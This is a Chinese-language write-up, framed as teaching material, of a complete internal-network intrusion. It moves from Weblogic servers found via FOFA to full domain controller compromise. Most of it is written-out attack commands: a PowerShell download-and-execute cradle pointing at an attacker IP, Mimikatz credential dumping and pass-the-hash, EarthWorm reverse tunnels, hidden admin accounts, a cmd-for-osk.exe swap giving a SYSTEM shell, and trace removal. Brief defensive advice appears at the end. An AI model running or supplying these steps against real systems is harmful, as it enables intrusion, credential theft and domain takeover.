记一次完整的内网渗透经历
字数 1670 2025-08-05 12:50:18
内网渗透实战教学文档
1. 目标发现与初始入侵
1.1 目标发现
- 使用FOFA搜索引擎批量查找Weblogic服务
- 筛选条件:出网、无杀软(或弱防护)、有内网环境
1.2 初始入侵方法
- 使用Cobalt Strike的"Scripted Web Delivery"模块
- 创建web服务用于一键下载和执行PowerShell
- 生成的PowerShell命令示例:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://攻击者IP:端口/script'))"
2. 信息收集
2.1 系统信息收集
- 执行命令获取系统信息:
systeminfo whoami /all net config workstation - 关键信息:
- 操作系统:Windows Server 2012
- 内网IP段:192.168.200.x
- 当前权限:通常为中等权限用户
2.2 内网扫描
- 使用Ladon工具扫描内网:
Ladon 192.168.200.0/24 - 扫描结果分析:
- 识别域环境
- 多网卡检测
- Web服务检测
2.3 凭证获取
- 使用Mimikatz获取凭证:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit - 获取到的加密密码可通过CMD5等在线服务解密
3. 横向移动技术
3.1 MS17-010漏洞利用
- 扫描内网MS17-010漏洞:
Ladon 192.168.200.0/24 MS17010 - 利用失败时的应对策略:
- 尝试不同EXP
- 更换工具
- 寻求外部帮助
3.2 代理隧道建立
- 使用EarthWorm(EW)建立Socks代理:
- 攻击服务器执行:
ew -s rcsocks -l 1900 -e 1200 - 目标机器执行:
ew -s rssocks -d 攻击者IP -e 1200
- 攻击服务器执行:
- 本地配置:
- Windows:使用SocksCap配置代理
- Kali Linux:修改
/etc/proxychains.conf并前缀proxychains执行命令
3.3 共享资源利用
- 查看共享计算机列表:
net view - 访问共享资源:
\\192.168.200.6\C$ - 发现备份服务器(Veeam Backup)
4. 备份服务器利用
4.1 备份文件分析
- 发现路径:
D:\Backup\ - 备份文件类型:Veeam® Backup & Replication软件生成
- 备份内容:域控制器(DC)全量备份
4.2 备份文件传输
- 创建隐藏账户:
net user backup$ Password123 /add net localgroup administrators backup$ /add - 使用7z压缩备份文件:
7z a -v700m backup.7z DC_backup.vbk - 通过共享文件夹和Web路径传输到本地
5. 虚拟机恢复与权限提升
5.1 本地环境准备
- 安装Veeam® Backup & Replication软件
- 恢复虚拟机备份
5.2 PE工具箱使用
- 使用老毛桃生成ISO PE工具箱
- 挂载到恢复的虚拟机
- 开机按ESC进入启动菜单选择PE
5.3 权限提升技术
- 替换osk.exe:
ren C:\Windows\System32\cmd.exe osk.exe copy /y osk.exe C:\Windows\System32\ - 登录界面点击"屏幕键盘"触发SYSTEM权限命令行
- 修改域用户密码并添加到管理员组:
net user 域用户 新密码 net localgroup administrators 域用户 /add
6. 域控制器控制
6.1 上线Cobalt Strike
- 绕过防火墙:
- 关闭防火墙(需管理员权限)
- 使用PowerShell方式上线
6.2 Hash获取与传递攻击
- 使用hashdump获取域控Hash
- 传递哈希攻击(PtH):
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:管理员 /domain:域名 /ntlm:hash" exit
7. 清理与痕迹消除
7.1 清理隐藏账户
net user backup$ /del
7.2 恢复系统文件
- 将原始osk.exe复制回System32目录
8. 工具清单
| 工具名称 | 用途 |
|---|---|
| Cobalt Strike | 远控、横向移动 |
| Ladon | 内网扫描 |
| Mimikatz | 凭证获取、PtH攻击 |
| EarthWorm | 代理隧道 |
| 7-Zip | 文件压缩 |
| Veeam Backup | 备份恢复 |
| 老毛桃PE | 系统修复 |
9. 防御建议
-
Weblogic防护:
- 及时安装补丁
- 限制访问IP
- 删除不必要的示例程序
-
内网防护:
- 启用杀软和EDR
- 网络分段隔离
- 禁用不必要的共享
-
备份服务器防护:
- 严格访问控制
- 备份文件加密
- 监控异常访问
-
域控防护:
- 启用LSA保护
- 限制管理员登录
- 监控异常认证
-
日志监控:
- 集中收集日志
- 设置可疑行为告警
- 定期审计
10. 总结
本案例展示了从外网Weblogic漏洞到完全控制内网域环境的完整过程,重点技术包括:
- 初始入侵的Web Delivery
- 内网信息收集与扫描
- 代理隧道的建立与使用
- 备份服务器的利用
- 虚拟机恢复与权限提升
- 域控的Hash获取与PtH攻击
防御方应重点关注边界防护、内网监控和权限管理,特别是备份系统的安全防护。